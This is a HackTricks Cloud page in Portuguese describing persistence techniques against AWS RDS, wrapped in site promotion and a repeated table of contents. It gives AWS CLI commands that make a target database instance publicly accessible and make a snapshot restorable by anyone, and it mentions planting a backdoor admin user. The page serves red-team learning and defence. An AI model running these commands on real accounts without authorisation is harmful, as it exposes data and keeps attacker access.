AWS - RDS Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RDS

Para mais informações, consulte:

Tornar a instância acessível publicamente: `rds:ModifyDBInstance`

Um atacante com esta permissão pode modificar uma instância RDS existente para habilitar a acessibilidade pública.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Criar um usuário administrador dentro do DB

Um atacante poderia criar um usuário dentro do DB para que mesmo se a senha do usuário master for modificada, ele não perca o acesso ao banco de dados.

Tornar o snapshot público

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Suporte ao HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

PreviousAWS - Lightsail Persistence NextAWS - S3 Persistence

Last updated 3 days ago

RDS

Tornar a instância acessível publicamente: rds:ModifyDBInstance

Criar um usuário administrador dentro do DB

Tornar o snapshot público

RDS

Tornar a instância acessível publicamente: rds:ModifyDBInstance

Criar um usuário administrador dentro do DB

Tornar o snapshot público

Tornar a instância acessível publicamente: `rds:ModifyDBInstance`

Tornar a instância acessível publicamente: `rds:ModifyDBInstance`